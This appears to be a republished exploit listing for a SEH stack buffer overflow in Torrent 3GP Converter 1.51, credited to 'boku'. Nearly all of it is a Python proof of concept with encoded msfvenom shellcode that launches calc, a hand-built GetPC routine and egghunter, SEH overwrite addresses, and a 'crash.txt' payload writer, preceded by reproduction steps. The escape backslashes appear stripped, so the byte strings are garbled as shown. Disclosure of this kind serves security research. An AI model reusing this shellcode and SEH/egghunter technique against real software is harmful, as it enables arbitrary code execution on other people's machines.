Torrent 3GP Converter 1.51 – Stack Overflow (SEH)

# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
# Exploit Author: boku
# Date: 2020-01-24
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe
# Version: Torrent 3GP Converter Version 1.51 Build 116
# Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
#  1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86
#  2) run python script & open created 'crash.txt' file
#  3) select-all > copy-all
#  4) in app, click 'Register' on the bottom
#  5) in 'Name:' textbox enter 'a'
#  6) in 'Code:' textbox paste buffer
#  7) click 'OK', calculator will open & app will crash

#!/usr/bin/python

# Bad Chars 
# x00 => x20 # x0d Truncates buffer # x2d Gets ejected from buffer
# x61-x6f => x41-x4f / ASCII Lower => ASCII Upper
# x70-x7a => x50-x5a / ASCII Lower => ASCII Upper
# x9a => x8a # x9c => x8c # x9e => x8e
# xe0-xef => xc0-xcf # xf0-xf6 => xd0-xd6
# xf8-xfe => xd8-xde # xff => x9f
# badChars='x00x0dx2dx61x62x6364x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax9ax9cx9exe0xe1xe2xe3xe4xe5xe6xeexe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf8xf9xfaxfbxfcxfdxfexff'
# Max shellcode size is 2384  bytes
# - First 2384 bytes of our buffer is left unmangled on the stack
# msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode
# x86/alpha_upper chosen with final size 447
# Payload size: 447 bytes
## msfvenom x86/alpha_uppers GetPC Routine ##
#  [!] Does not work because of the bad chars!
# Manually replaced with a working version of GetPC for this exploit
# 89E5            mov ebp, esp
shellcode = b'x54x5D' # push esp # pop ebp
# DBCD            fcmovne st, st(5)
shellcode += b'x89xCF' # mov edi, ecx
# D975 F4         fstenv [ebp-C]
shellcode += b'x47x47x90' # inc edi # inc edi # nop
# 5F              pop edi  
shellcode += b'x90' # nop
shellcode += b"x57x59x49"
shellcode += b"x49x49x49x43x43x43x43x43x43x51x5a"
shellcode += b"x56x54x58x33x30x56x58x34x41x50x30"
shellcode += b"x41x33x48x48x30x41x30x30x41x42x41"
shellcode += b"x41x42x54x41x41x51x32x41x42x32x42"
shellcode += b"x42x30x42x42x58x50x38x41x43x4ax4a"
shellcode += b"x49x4bx4cx5ax48x4dx52x55x50x55x50"
shellcode += b"x33x30x43x50x4bx39x4bx55x46x51x59"
shellcode += b"x50x42x44x4cx4bx30x50x36x50x4cx4b"
shellcode += b"x56x32x34x4cx4cx4bx56x32x42x34x4c"
shellcode += b"x4bx34x32x31x38x34x4fx4ex57x50x4a"
shellcode += b"x37x56x30x31x4bx4fx4ex4cx47x4cx35"
shellcode += b"x31x43x4cx34x42x56x4cx47x50x39x51"
shellcode += b"x58x4fx34x4dx45x51x59x57x4ax42x4a"
shellcode += b"x52x46x32x56x37x4cx4bx31x42x44x50"
shellcode += b"x4cx4bx50x4ax47x4cx4cx4bx50x4cx42"
shellcode += b"x31x33x48x4bx53x51x58x45x51x4ex31"
shellcode += b"x30x51x4cx4bx31x49x51x30x55x51x59"
shellcode += b"x43x4cx4bx30x49x42x38x4bx53x37x4a"
shellcode += b"x57x39x4cx4bx47x44x4cx4bx53x31x59"
shellcode += b"x46x46x51x4bx4fx4ex4cx39x51x38x4f"
shellcode += b"x34x4dx35x51x4fx37x57x48x4dx30x53"
shellcode += b"x45x4cx36x45x53x53x4dx4ax58x37x4b"
shellcode += b"x43x4dx46x44x33x45x4ax44x56x38x4c"
shellcode += b"x4bx36x38x47x54x45x51x38x53x32x46"
shellcode += b"x4cx4bx44x4cx30x4bx4cx4bx50x58x45"
shellcode += b"x4cx53x31x59x43x4cx4bx45x54x4cx4b"
shellcode += b"x33x31x38x50x4dx59x57x34x57x54x36"
shellcode += b"x44x31x4bx51x4bx33x51x36x39x31x4a"
shellcode += b"x50x51x4bx4fx4dx30x51x4fx31x4fx50"
shellcode += b"x5ax4cx4bx45x42x5ax4bx4cx4dx51x4d"
shellcode += b"x52x4ax35x51x4cx4dx4cx45x48x32x35"
shellcode += b"x50x43x30x33x30x46x30x43x58x46x51"
shellcode += b"x4cx4bx42x4fx4dx57x4bx4fx59x45x4f"
shellcode += b"x4bx5ax50x38x35x39x32x31x46x53x58"
shellcode += b"x4ex46x5ax35x4fx4dx4dx4dx4bx4fx58"
shellcode += b"x55x47x4cx35x56x43x4cx35x5ax4bx30"
shellcode += b"x4bx4bx4dx30x42x55x44x45x4fx4bx37"
shellcode += b"x37x45x43x54x32x32x4fx42x4ax55x50"
shellcode += b"x36x33x4bx4fx58x55x45x33x55x31x32"
shellcode += b"x4cx43x53x35x50x41x41"
# Stack EggHunter for fun & profit 
egg = 'BOKU'
hunterOS = 'x41'*(2784-len(egg+egg+shellcode))
# After executing the code in nSEH, we are left with 88 bytes to create our Hunter
hunter  = 'x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC
hunter  += 'x5B' # pop ebx / EBX=PC
hunter  += 'x80x43x29x20'     #   add byte [ebx+41], 0x20 / 20+55=7F=jnz
hunter  += 'x80x43x33x20'     #   add byte [ebx+51], 0x20 / 20+55=7F=jnz
hunter  += 'xB8x42x4Fx4Bx55' # mov eax,0x424f4b55
hunter  += 'x54' # push esp
hunter  += 'x59' # pop ecx
hunter  += 'x90'*18 # nop fillers for jnz short -7 loop
hunter  += 'x49' # dec ecx
hunter  += 'x3Bx01' # cmp eax, [ecx]
hunter  += 'x55xF7' # 75F7 = jnz short -7 / Have to avoid bad xF- chars
hunter  += 'x51' # push ecx
hunter  += 'x5a' # pop edx
hunter  += 'x4a'*4 # dec edx * 4 / check if second egg matchs
hunter  += 'x3Bx02' # cmp eax, [edx]
hunter  += 'x55xDF' # jnz short -31 / back to the loop - avoid bad chars
hunter  += 'x83xc14' # add ecx, 0x4 / start of shellcode after eggs
hunter  += 'x31xd2' # xor edx,edx
hunter  += 'x52' # push edx
hunter  += 'xC6x44x24x02x4B' # mov byte [esp+0x2],0x4b
hunter  += 'xC6x44x24x01x44' # mov byte [esp+0x1],0x44
hunter  += 'xC6x04x24x39'     # mov byte [esp],0x39
# [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
#   ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:Program FilesTorrent 3GP Converterbsvideoconverter.exe)
hunter  += 'xc3' # ret
huntRmdr = 'x41'*(88-len(hunter))
nsehOS   = 'x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr))
nSEH     = 'x83xC4x04xC3'     # add esp,byte +0x4 # ret
# 3-byte SEH overwrite using the truncating Null byte
SEH      = 'x0fx47x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe] 
         # ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE} 

payload  = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH

try:
    f=open("crash.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
            

Comments are closed.